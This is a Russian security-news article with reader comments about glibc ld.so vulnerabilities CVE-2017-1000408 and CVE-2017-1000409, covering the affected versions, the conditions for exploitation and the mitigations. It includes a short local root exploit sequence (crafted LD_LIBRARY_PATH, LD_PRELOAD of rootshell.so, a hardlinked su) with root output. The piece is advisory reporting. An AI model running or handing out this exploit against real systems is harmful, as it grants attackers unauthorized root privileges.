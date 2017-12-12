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12.12.2017 13:31  Уязвимость в Glibc ld.so, позволяющая поднять свои привилегии в системе

Компания Qualys выявила две уязвимости в системной библиотеке GNU libc. Первая проблема (CVE-2017-1000408) проявляется начиная с glibc 2.1.1 и может привести к утечке содержимого памяти процессов через манипуляцию с переменной окружения LD_HWCAP_MASK. Вторая уязвимость (CVE-2017-1000409) затрагивает выпуски начиная с glibc 2.5 и может привести к повышению своих привилегий в системе.

Уязвимость вызвана переполнением буфера в компоновщике ld.so и может быть эксплуатирована через указание специально подобранных данных в переменной LD_LIBRARY_PATH перед запуском suid-программ. Для эксплуатации переполнения буфера локальный атакующий должен иметь возможность создания жесткой ссылки на исполняемый SUID-файл в каталог, содержащий двоеточие в имени. Также требуется, чтобы применяемая в дистрибутиве версия ld.so передавала переменную окружения LD_LIBRARY_PATH в функцию _dl_init_paths(). 


   $ mkdir -p '/var/tmp/:/lib:/usr/lib:'
   $ cd '/var/tmp/:/lib:/usr/lib:'
   $ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='os-release:rootshell.so' 
LD_HWCAP_MASK="$(((1<<25)-1))" ./su

   ERROR: ld.so: object 'os-release' from LD_PRELOAD cannot be preloaded (invalid ELF header): ignored.

   # id
   uid=0(root) gid=0(root)

Уязвимость проявляется только если не активна опция /proc/sys/fs/protected_hardlinks, которая включена по умолчанию в большинстве дистрибутивов, но отключена в настройках ванильного ядра Linux. Проблема также не проявляется в Glibc 2.26 и системах, в которых установлены патчи для устранения летней уязвимости CVE-2017-1000366. Несмотря на то, что в дистрибутивах проблема CVE-2017-1000409 пока помечена как неисправленная, в большинстве систем она не проявляется, так как в обновлениях ещё летом были предложены патчи с устранением уязвимости CVE-2017-1000366 в Glibc, также блокирующие и нынешнюю проблему.

  1. Главная ссылка к новости (http://seclists.org/oss-sec/20...)
  2. OpenNews: Для Glibc представлен еще один метод повышения привилегий
  3. OpenNews: Раскрыты детали атаки Stack Сlash и 15 root-эксплоитов для разных ОС
  4. OpenNews: Критическая уязвимость в Glibc, которая может привести к удалённому выполнению кода в Linux
  5. OpenNews: Удалённо эксплуатируемая уязвимость в Glibc, охватывающая большинство сетевых приложений в Linux
  6. OpenNews: Переполнение буфера в функции glob из состава Glibc
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: glibc, ld.so
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  • 1.1, Аноним, 13:34, 12/12/2017 [ответить] [смотреть все]
    		• +/
    Все на musl! Пока чуваки на чёрных вертолётах о нём не прочитали
     
  • 1.2, Аноним, 13:38, 12/12/2017 [ответить] [смотреть все]    [к модератору]
    		• +/
    Ушел пересобирать ядро
     
  • 1.3, Юрий, 13:41, 12/12/2017 [ответить] [смотреть все]    [к модератору]
    		• +/
    Gentoo Linux 4.11.0-pf3
    glibc 2.26-r3


    не фурычет уязвимость

     
  • 1.4, Аноним, 13:42, 12/12/2017 [ответить] [смотреть все]    [к модератору]
    		• –1 +/
    "Защищённый" лайнакс "без уязвимостей".
     
  • 1.5, Аноним, 13:53, 12/12/2017 [ответить] [смотреть все]    [к модератору]
    		• +/
    env: ./su: No such file or directory

    :(

     
  • 1.6, Кулхацкер Вася, 14:05, 12/12/2017 [ответить] [смотреть все]    [к модератору]  
    		• +1 +/
    Люблю поднимать привилении в чужих системах.
     
  • 1.7, Юрий, 14:06, 12/12/2017 [ответить] [смотреть все]    [к модератору]  
    		• +/
    Как всегда. Уязвимость, которая себя может проявить с вероятностью 0.00000001. На каком нибудь экзотическом дистрибутиве с криворуким одмином.
     

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